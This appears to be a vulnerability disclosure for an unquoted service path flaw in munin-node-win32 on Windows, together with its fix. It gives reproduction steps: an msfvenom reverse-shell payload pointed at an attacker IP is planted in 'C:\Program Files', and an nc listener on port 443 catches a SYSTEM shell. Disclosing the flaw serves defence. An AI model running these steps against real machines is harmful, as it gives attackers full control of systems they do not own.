As per Munin home page, Munin the monitoring tool surveys all your computers and remembers what it saw. It presents all the information in graphs through a web interface. Its emphasis is on plug and play capabilities. After completing an installation a high number of monitoring plugins will be playing with no more effort.
Using Munin you can easily monitor the performance of your computers, networks, SANs, applications, weather measurements and whatever comes to mind. It makes it easy to determine “what’s different today?” when a performance problem crops up. It makes it easy to see how you’re doing capacity-wise on any resources.
There are two ways to monitor Windows machines, one using munin-node for Windows called “munin-node-win32” and another using SNMP.
Munin-node-win32 can get you more info than SNMP will supply (namely system temperatures). You can get it here, https://github.com/munin-monitoring/munin-node-win32 it works the same as the native munin-node program.
This is Local Privilege Escalation vulnerability which gives SYSTEM level access to the attacker once he/she gets initial-foothold on the machine.
Vulnerability Exploited: Unquoted Service Path of service munin-node
Vulnerability Type: Privilege Escalation
Vulnerability Explanation: Value specified in service munin-node’s Binary_Path_Name is not quoted. This could allow an attacker with local access to execute code with administrative privileges. More details on Unquoted Paths Local Privilege Escalation vulnerability can be found here.
Vulnerability Fix: When registering munin-node as a service, surround complete Binary Path with double quotes.
Vulnerability tested on Windows 7 (32-bit)
Steps to reproduce:
Prerequisites:
- Munin-node-win32 is installed as service (which is a part of default installation). (Must)
- User (People User/Service User) is able to copy/create file in ‘C’ directory. (Must)
- User can start/restart service “Munin Node for Windows 1.6.0 (Beta)” (Optional)
Note: All the following steps are performed on the munin node installed with default configurations.
Determine name, displayname of Munin node client service
Command: wmic service get name,displayname,startmode |findstr /i “munin”
Name of Munin's registered service is munin-node.
Print details of service “munin-node”
Command: sc qc munin-node
START_TYPE is 2 AUTO_START, so service will by-default start after system restart/boot.
BINARY_PATH_NAME value is vulnerable to path interception because the path has spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. So, an attacker can place malicious payload at “C:\Program” or “C:\Program Files\Munin”, that will be run instead of the intended program.
Generate reverse shell payload on attacker machine (Kali)
Command: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.132 LPORT=443 -f exe --platform windows -o Munin
In above command replace LHOST value with attacker machine’s IP address.
Transfer file Munin (generated in above command) on target machine at “C:\Program Files\”.
Following snippet shows file is placed at C:\Program Files:
In attacker machine, start Netcat listener on port 443
Command: nc -nvlp 443
In target machine start/restart service “Munin Node for Windows 1.6.0 (Beta)”
Note: If the user does not have permission to restart/start the service, the payload will be executed upon system reboot.
Reverse shell received at attacker machine with system level access
Upon service reboot, received SYSTEM-level access.
